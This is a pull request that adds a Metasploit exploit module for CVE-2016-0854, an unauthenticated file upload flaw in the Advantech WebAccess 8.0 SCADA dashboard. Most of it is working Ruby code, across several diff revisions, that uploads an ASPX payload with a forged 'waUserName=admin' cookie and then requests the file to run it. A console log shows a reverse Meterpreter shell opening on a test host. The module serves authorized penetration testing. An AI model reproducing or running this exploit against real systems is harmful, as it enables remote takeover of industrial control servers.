### PR TITLE
Create exploit for CVE-2016-0854:Advantech WebAccess Dashboard Viewer Arbitrary File Upload

### DIFF
--- a/modules/exploits/windows/scada/advantech_webaccess_dashboard_file_upload.rb
+++ b/modules/exploits/windows/scada/advantech_webaccess_dashboard_file_upload.rb
@@ -1,0 +1,116 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::EXE
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Advantech WebAccess Dashboard Viewer Arbitrary File Upload",
+      'Description'    => %q{
+       This module exploits a arbitrary file upload vulnerability found in Advantech WebAccess 8.0.
+       This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations
+       of Advantech WebAccess.Authentication is not required to exploit this vulnerability.
+
+       The specific flaw exists within the WebAccess Dashboard Viewer. Insufficient validation within
+       the uploadImageCommon function in the UploadAjaxAction script allows unauthenticated callers to
+       upload arbitrary code (instead of an image) to the server, which will then be executed under the
+       high-privilege context of the IIS AppPool.
+
+       This exploit was successfully tested on Advantech WebAccess 8.0.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'rgod', # Vulnerability discovery
+          'Zhou Yu <504137480[at]qq.com>' # MSF module
+        ],
+      'References'     =>
+        [
+          [ 'CVE', '2016-0854' ],
+          [ 'ZDI', '16-128' ],
+          [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01']
+        ],
+       'Platform'      => 'win',
+       'Targets'       =>
+        [
+          ['Advantech WebAccess 8.0', {}]
+        ],
+       'Privileged'     => false,
+       'DisclosureDate' => "Feb 5 2016",
+       'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        Opt::RPORT(80)
+      ], self.class)
+
+
+  end
+
+  def check
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri('WADashboard','ajax','UploadAjaxAction.aspx?AspxAutoDetectCookieSupport=1'),
+      'cookie' => 'AspxAutoDetectCookieSupport=1'
+    })
+
+    if res && res.code == 200
+      Exploit::CheckCode::Detected
+
+    else
+      Exploit::CheckCode::Unknown
+
+    end
+
+
+  end
+
+  def exploit
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri('WADashboard','ajax','UploadAjaxAction.aspx?AspxAutoDetectCookieSupport=1'),
+      'cookie' => 'AspxAutoDetectCookieSupport=1'
+    })
+    unless res && res.code == 200
+      fail_with(Failure::UnexpectedReply, "#{peer} - Unable to upload payload")
+    end
+
+    cookie = res.get_cookies
+    exe = generate_payload_exe
+    aspx = Msf::Util::EXE.to_exe_aspx(exe)
+    file_name = "#{Rex::Text.rand_text_alpha(5)}.aspx"
+    data = Rex::MIME::Message.new
+    data.add_part('uploadFile', nil, nil, 'form-data; name="actionName"')
+    data.add_part(aspx, nil, nil, "form-data; name=\"file\"; filename=\"#{file_name}\"")
+
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri('WADashboard','ajax','UploadAjaxAction.aspx'),
+      'cookie' => cookie,
+      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
+      'data' => data.to_s
+    })
+
+    if res && res.code == 200 && res.body.to_s =~ /{"resStatus":"0","resString":"\/#{file_name}"}/
+      print_good("#{peer} - Payload uploaded successfully")
+    else
+      fail_with(Failure::UnexpectedReply, "#{peer} - Payload uploaded failed")
+    end
+    print_status("#{peer} - Executing payload...")
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri('WADashboard',file_name),
+      'cookie' => cookie
+    })
+
+  end
+
+end

--- a/modules/exploits/windows/scada/advantech_webaccess_dashboard_file_upload.rb
+++ b/modules/exploits/windows/scada/advantech_webaccess_dashboard_file_upload.rb
@@ -4,7 +4,7 @@
 ##
 
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient

--- a/modules/exploits/windows/scada/advantech_webaccess_dashboard_file_upload.rb
+++ b/modules/exploits/windows/scada/advantech_webaccess_dashboard_file_upload.rb
@@ -112,7 +112,10 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    return unless vuln_version?
+    unless vuln_version?
+      print_status("#{peer} - Cannot reliably check exploitability.")
+      return
+    end
     filename = "#{Rex::Text.rand_text_alpha(5)}.aspx"
     filedata = Msf::Util::EXE.to_exe_aspx(generate_payload_exe)
 

--- a/modules/exploits/windows/scada/advantech_webaccess_dashboard_file_upload.rb
+++ b/modules/exploits/windows/scada/advantech_webaccess_dashboard_file_upload.rb
@@ -90,6 +90,7 @@ class MetasploitModule < Msf::Exploit::Remote
     data.add_part('uploadFile', nil, nil, 'form-data; name="actionName"')
     data.add_part(aspx, nil, nil, "form-data; name=\"file\"; filename=\"#{file_name}\"")
 
+
     res = send_request_cgi({
       'method' => 'POST',
       'uri' => normalize_uri('WADashboard','ajax','UploadAjaxAction.aspx'),
@@ -104,7 +105,6 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::UnexpectedReply, "#{peer} - Payload uploaded failed")
     end
     print_status("#{peer} - Executing payload...")
-    
     res = send_request_cgi({
       'method' => 'GET',
       'uri' => normalize_uri('WADashboard',file_name),

--- a/modules/exploits/windows/scada/advantech_webaccess_dashboard_file_upload.rb
+++ b/modules/exploits/windows/scada/advantech_webaccess_dashboard_file_upload.rb
@@ -56,8 +56,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def check
     res = send_request_cgi({
-      'method' => 'POST',
-      'uri' => normalize_uri('WADashboard','ajax','UploadAjaxAction.aspx?AspxAutoDetectCookieSupport=1'),
+      'method' => 'GET',
+      'uri' => normalize_uri('WADashboard','ajax','UploadAjaxAction.aspx'),
       'cookie' => 'AspxAutoDetectCookieSupport=1'
     })
 
@@ -74,8 +74,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     res = send_request_cgi({
-      'method' => 'POST',
-      'uri' => normalize_uri('WADashboard','ajax','UploadAjaxAction.aspx?AspxAutoDetectCookieSupport=1'),
+      'method' => 'GET',
+      'uri' => normalize_uri('WADashboard','ajax','UploadAjaxAction.aspx'),
       'cookie' => 'AspxAutoDetectCookieSupport=1'
     })
     unless res && res.code == 200
@@ -89,7 +89,6 @@ class MetasploitModule < Msf::Exploit::Remote
     data = Rex::MIME::Message.new
     data.add_part('uploadFile', nil, nil, 'form-data; name="actionName"')
     data.add_part(aspx, nil, nil, "form-data; name=\"file\"; filename=\"#{file_name}\"")
-
 
     res = send_request_cgi({
       'method' => 'POST',
@@ -105,6 +104,7 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::UnexpectedReply, "#{peer} - Payload uploaded failed")
     end
     print_status("#{peer} - Executing payload...")
+    
     res = send_request_cgi({
       'method' => 'GET',
       'uri' => normalize_uri('WADashboard',file_name),

--- a/modules/exploits/windows/scada/advantech_webaccess_dashboard_file_upload.rb
+++ b/modules/exploits/windows/scada/advantech_webaccess_dashboard_file_upload.rb
@@ -15,10 +15,10 @@ class MetasploitModule < Msf::Exploit::Remote
       'Name'           => "Advantech WebAccess Dashboard Viewer Arbitrary File Upload",
       'Description'    => %q{
          This module exploits an arbitrary file upload vulnerability found in Advantech WebAccess 8.0.
-         
+
          This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations
          of Advantech WebAccess. Authentication is not required to exploit this vulnerability.
-         
+
          The specific flaw exists within the WebAccess Dashboard Viewer. Insufficient validation within
          the uploadImageCommon function in the UploadAjaxAction script allows unauthenticated callers to
          upload arbitrary code (instead of an image) to the server, which will then be executed under the
@@ -128,3 +128,4 @@ class MetasploitModule < Msf::Exploit::Remote
     return unless exec_file?(filename)
   end
 end
+

--- a/modules/exploits/windows/scada/advantech_webaccess_dashboard_file_upload.rb
+++ b/modules/exploits/windows/scada/advantech_webaccess_dashboard_file_upload.rb
@@ -50,7 +50,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def version_match(data)
     # Software Build : 8.0-2015.08.15
     fingerprint = data.match(/Software\sBuild\s:\s(?<version>\d{1,2}\.\d{1,2})-(?<year>\d{4})\.(?<month>\d{1,2})\.(?<day>\d{1,2})/)
-    fingerprint['version']
+    fingerprint['version'] unless fingerprint.nil?
   end
 
   def vuln_version?

--- a/modules/exploits/windows/scada/advantech_webaccess_dashboard_file_upload.rb
+++ b/modules/exploits/windows/scada/advantech_webaccess_dashboard_file_upload.rb
@@ -52,7 +52,6 @@ class MetasploitModule < Msf::Exploit::Remote
         OptString.new('TARGETURI', [true, 'The path of Advantech WebAccess 8.0', '/'])
       ], self.class)
 
-
   end
 
   def check

--- a/modules/exploits/windows/scada/advantech_webaccess_dashboard_file_upload.rb
+++ b/modules/exploits/windows/scada/advantech_webaccess_dashboard_file_upload.rb
@@ -115,7 +115,11 @@ class MetasploitModule < Msf::Exploit::Remote
     return unless vuln_version?
     filename = "#{Rex::Text.rand_text_alpha(5)}.aspx"
     filedata = Msf::Util::EXE.to_exe_aspx(generate_payload_exe)
+
+    print_status("#{peer} - Uploading malicious file...")
     return unless upload_file?(filename, filedata)
+
+    print_status("#{peer} - Executing #{filename}...")
     return unless exec_file?(filename)
   end
 end

--- a/modules/exploits/windows/scada/advantech_webaccess_dashboard_file_upload.rb
+++ b/modules/exploits/windows/scada/advantech_webaccess_dashboard_file_upload.rb
@@ -14,9 +14,11 @@ class MetasploitModule < Msf::Exploit::Remote
     super(update_info(info,
       'Name'           => "Advantech WebAccess Dashboard Viewer Arbitrary File Upload",
       'Description'    => %q{
-         This module exploits a arbitrary file upload vulnerability found in Advantech WebAccess 8.0.
+         This module exploits an arbitrary file upload vulnerability found in Advantech WebAccess 8.0.
+         
          This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations
-         of Advantech WebAccess.Authentication is not required to exploit this vulnerability.
+         of Advantech WebAccess. Authentication is not required to exploit this vulnerability.
+         
          The specific flaw exists within the WebAccess Dashboard Viewer. Insufficient validation within
          the uploadImageCommon function in the UploadAjaxAction script allows unauthenticated callers to
          upload arbitrary code (instead of an image) to the server, which will then be executed under the

--- a/modules/exploits/windows/scada/advantech_webaccess_dashboard_file_upload.rb
+++ b/modules/exploits/windows/scada/advantech_webaccess_dashboard_file_upload.rb
@@ -66,7 +66,7 @@ class MetasploitModule < Msf::Exploit::Remote
       )
     end
 
-    ver = version_match(res.body)
+    ver = res && res.body ? version_match(res.body) : nil
     true ? Gem::Version.new(ver) == Gem::Version.new('8.0') : false
   end
 

--- a/modules/exploits/windows/scada/advantech_webaccess_dashboard_file_upload.rb
+++ b/modules/exploits/windows/scada/advantech_webaccess_dashboard_file_upload.rb
@@ -4,113 +4,118 @@
 ##
 
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::EXE
 
-  def initialize(info={})
+  def initialize(info = {})
     super(update_info(info,
       'Name'           => "Advantech WebAccess Dashboard Viewer Arbitrary File Upload",
       'Description'    => %q{
-       This module exploits a arbitrary file upload vulnerability found in Advantech WebAccess 8.0.
-       This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations
-       of Advantech WebAccess.Authentication is not required to exploit this vulnerability.
-
-       The specific flaw exists within the WebAccess Dashboard Viewer. Insufficient validation within
-       the uploadImageCommon function in the UploadAjaxAction script allows unauthenticated callers to
-       upload arbitrary code (instead of an image) to the server, which will then be executed under the
-       high-privilege context of the IIS AppPool.
-
-       This exploit was successfully tested on Advantech WebAccess 8.0.
+         This module exploits a arbitrary file upload vulnerability found in Advantech WebAccess 8.0.
+         This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations
+         of Advantech WebAccess.Authentication is not required to exploit this vulnerability.
+         The specific flaw exists within the WebAccess Dashboard Viewer. Insufficient validation within
+         the uploadImageCommon function in the UploadAjaxAction script allows unauthenticated callers to
+         upload arbitrary code (instead of an image) to the server, which will then be executed under the
+         high-privilege context of the IIS AppPool.
       },
       'License'        => MSF_LICENSE,
-      'Author'         =>
-        [
-          'rgod', # Vulnerability discovery
-          'Zhou Yu <504137480[at]qq.com>' # MSF module
-        ],
-      'References'     =>
-        [
-          [ 'CVE', '2016-0854' ],
-          [ 'ZDI', '16-128' ],
-          [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01']
-        ],
-       'Platform'      => 'win',
-       'Targets'       =>
-        [
-          ['Advantech WebAccess 8.0', {}]
-        ],
-       'Privileged'     => false,
-       'DisclosureDate' => "Feb 5 2016",
-       'DefaultTarget'  => 0))
+      'Author'         => [
+        'rgod', # Vulnerability discovery
+        'Zhou Yu <504137480[at]qq.com>' # MSF module
+      ],
+      'References'     => [
+        [ 'CVE', '2016-0854' ],
+        [ 'ZDI', '16-128' ],
+        [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01']
+      ],
+      'Platform'      => 'win',
+      'Targets'       => [
+        ['Advantech WebAccess 8.0', {}]
+      ],
+      'Privileged'     => false,
+      'DisclosureDate' => "Feb 5 2016",
+      'DefaultTarget'  => 0))
 
     register_options(
       [
-        Opt::RPORT(80)
+        Opt::RPORT(80),
+        OptString.new('TARGETURI', [true, 'The base path of Advantech WebAccess 8.0', '/'])
       ], self.class)
+  end
 
+  def version_match(data)
+    # Software Build : 8.0-2015.08.15
+    fingerprint = data.match(/Software\sBuild\s:\s(?<version>\d{1,2}\.\d{1,2})-(?<year>\d{4})\.(?<month>\d{1,2})\.(?<day>\d{1,2})/)
+    fingerprint['version']
+  end
 
+  def vuln_version?
+    res = send_request_cgi(
+      'method'   => 'GET',
+      'uri'      => target_uri.to_s
+    )
+
+    if res.redirect?
+      res = send_request_cgi(
+        'method' => 'GET',
+        'uri'    => normalize_uri(res.redirection)
+      )
+    end
+
+    ver = version_match(res.body)
+    true ? Gem::Version.new(ver) == Gem::Version.new('8.0') : false
   end
 
   def check
-    res = send_request_cgi({
-      'method' => 'POST',
-      'uri' => normalize_uri('WADashboard','ajax','UploadAjaxAction.aspx?AspxAutoDetectCookieSupport=1'),
-      'cookie' => 'AspxAutoDetectCookieSupport=1'
-    })
-
-    if res && res.code == 200
-      Exploit::CheckCode::Detected
-
+    if vuln_version?
+      Exploit::CheckCode::Appears
     else
-      Exploit::CheckCode::Unknown
-
+      Exploit::CheckCode::Safe
     end
+  end
 
+  def upload_file?(filename, file)
+    uri = normalize_uri(target_uri, 'WADashboard', 'ajax', 'UploadAjaxAction.aspx')
 
+    data = Rex::MIME::Message.new
+    data.add_part('uploadFile', nil, nil, 'form-data; name="actionName"')
+    data.add_part(file, nil, nil, "form-data; name=\"file\"; filename=\"#{filename}\"")
+
+    res = send_request_cgi(
+      'method'  => 'POST',
+      'uri'     => uri,
+      'cookie'  => "waUserName=admin",
+      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
+      'data'    => data.to_s
+    )
+    true ? res && res.code == 200 && res.body.include?("{\"resStatus\":\"0\",\"resString\":\"\/#{filename}\"}") : false
+  end
+
+  def exec_file?(filename)
+    uri = normalize_uri(target_uri)
+    res = send_request_cgi(
+      'method'  => 'GET',
+      'uri'     => uri
+    )
+
+    uri = normalize_uri(target_uri, 'WADashboard', filename)
+    res = send_request_cgi(
+      'method'   => 'GET',
+      'uri'      => uri,
+      'cookie'   => res.get_cookies
+    )
+    true ? res && res.code == 200 : false
   end
 
   def exploit
-    res = send_request_cgi({
-      'method' => 'POST',
-      'uri' => normalize_uri('WADashboard','ajax','UploadAjaxAction.aspx?AspxAutoDetectCookieSupport=1'),
-      'cookie' => 'AspxAutoDetectCookieSupport=1'
-    })
-    unless res && res.code == 200
-      fail_with(Failure::UnexpectedReply, "#{peer} - Unable to upload payload")
-    end
-
-    cookie = res.get_cookies
-    exe = generate_payload_exe
-    aspx = Msf::Util::EXE.to_exe_aspx(exe)
-    file_name = "#{Rex::Text.rand_text_alpha(5)}.aspx"
-    data = Rex::MIME::Message.new
-    data.add_part('uploadFile', nil, nil, 'form-data; name="actionName"')
-    data.add_part(aspx, nil, nil, "form-data; name=\"file\"; filename=\"#{file_name}\"")
-
-
-    res = send_request_cgi({
-      'method' => 'POST',
-      'uri' => normalize_uri('WADashboard','ajax','UploadAjaxAction.aspx'),
-      'cookie' => cookie,
-      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
-      'data' => data.to_s
-    })
-
-    if res && res.code == 200 && res.body.to_s =~ /{"resStatus":"0","resString":"\/#{file_name}"}/
-      print_good("#{peer} - Payload uploaded successfully")
-    else
-      fail_with(Failure::UnexpectedReply, "#{peer} - Payload uploaded failed")
-    end
-    print_status("#{peer} - Executing payload...")
-    res = send_request_cgi({
-      'method' => 'GET',
-      'uri' => normalize_uri('WADashboard',file_name),
-      'cookie' => cookie
-    })
-
+    return unless vuln_version?
+    filename = "#{Rex::Text.rand_text_alpha(5)}.aspx"
+    filedata = Msf::Util::EXE.to_exe_aspx(generate_payload_exe)
+    return unless upload_file?(filename, filedata)
+    return unless exec_file?(filename)
   end
-
 end

--- a/modules/exploits/windows/scada/advantech_webaccess_dashboard_file_upload.rb
+++ b/modules/exploits/windows/scada/advantech_webaccess_dashboard_file_upload.rb
@@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'Description'    => %q{
        This module exploits a arbitrary file upload vulnerability found in Advantech WebAccess 8.0.
        This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations
-       of Advantech WebAccess.Authentication is not required to exploit this vulnerability.
+       of Advantech WebAccess. Authentication is not required to exploit this vulnerability.
 
        The specific flaw exists within the WebAccess Dashboard Viewer. Insufficient validation within
        the uploadImageCommon function in the UploadAjaxAction script allows unauthenticated callers to
@@ -28,7 +28,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'License'        => MSF_LICENSE,
       'Author'         =>
         [
-          'rgod', # Vulnerability discovery
+          'rgod and mr_me', # Vulnerability discovery
           'Zhou Yu <504137480[at]qq.com>' # MSF module
         ],
       'References'     =>
@@ -48,41 +48,31 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options(
       [
-        Opt::RPORT(80)
+        Opt::RPORT(80),
+        OptString.new('TARGETURI', [true, 'The path of Advantech WebAccess 8.0', '/'])
       ], self.class)
 
 
   end
 
   def check
+    cookie = "waUserName=admin"
     res = send_request_cgi({
       'method' => 'GET',
-      'uri' => normalize_uri('WADashboard','ajax','UploadAjaxAction.aspx'),
-      'cookie' => 'AspxAutoDetectCookieSupport=1'
+      'uri' => normalize_uri(target_uri.path,'WADashboard','ajax','UploadAjaxAction.aspx'),
+      'cookie' => cookie
     })
 
     if res && res.code == 200
-      Exploit::CheckCode::Detected
-
+      return Exploit::CheckCode::Detected
     else
-      Exploit::CheckCode::Unknown
-
+      return Exploit::CheckCode::Unknown
     end
-
 
   end
 
   def exploit
-    res = send_request_cgi({
-      'method' => 'GET',
-      'uri' => normalize_uri('WADashboard','ajax','UploadAjaxAction.aspx'),
-      'cookie' => 'AspxAutoDetectCookieSupport=1'
-    })
-    unless res && res.code == 200
-      fail_with(Failure::UnexpectedReply, "#{peer} - Unable to upload payload")
-    end
-
-    cookie = res.get_cookies
+    cookie = "waUserName=admin"
     exe = generate_payload_exe
     aspx = Msf::Util::EXE.to_exe_aspx(exe)
     file_name = "#{Rex::Text.rand_text_alpha(5)}.aspx"
@@ -90,10 +80,9 @@ class MetasploitModule < Msf::Exploit::Remote
     data.add_part('uploadFile', nil, nil, 'form-data; name="actionName"')
     data.add_part(aspx, nil, nil, "form-data; name=\"file\"; filename=\"#{file_name}\"")
 
-
     res = send_request_cgi({
       'method' => 'POST',
-      'uri' => normalize_uri('WADashboard','ajax','UploadAjaxAction.aspx'),
+      'uri' => normalize_uri(target_uri.path,'WADashboard','ajax','UploadAjaxAction.aspx'),
       'cookie' => cookie,
       'ctype'   => "multipart/form-data; boundary=#{data.bound}",
       'data' => data.to_s
@@ -104,6 +93,7 @@ class MetasploitModule < Msf::Exploit::Remote
     else
       fail_with(Failure::UnexpectedReply, "#{peer} - Payload uploaded failed")
     end
+
     print_status("#{peer} - Executing payload...")
     res = send_request_cgi({
       'method' => 'GET',


### PR DESCRIPTION
This exploit was successfully tested on Advantech WebAccess 8.0 Win7 SP1 32-bit.

This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess 8.0.Authentication is not required to exploit this vulnerability.

Software Link: http://www.advantech.com/industrial-automation/webaccess/download 
## Verification

```
msf exploit(advantech_webaccess_dashboard_file_upload) > set RHOST 192.168.150.139
RHOST => 192.168.150.139
msf exploit(advantech_webaccess_dashboard_file_upload) > exploit

[*] Started reverse TCP handler on 192.168.150.245:4444 
[+] 192.168.150.139:80 - Payload uploaded successfully
[*] 192.168.150.139:80 - Executing payload...
[*] Sending stage (957487 bytes) to 192.168.150.139
[*] Meterpreter session 1 opened (192.168.150.245:4444 -> 192.168.150.139:50394) at 2016-04-17 00:30:05 -0400

meterpreter > sysinfo
Computer        : WIN-EF41OJ7HP67
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/win32
meterpreter > quit
[*] Shutting down Meterpreter...

[*] 192.168.150.139 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(advantech_webaccess_dashboard_file_upload) > 

```
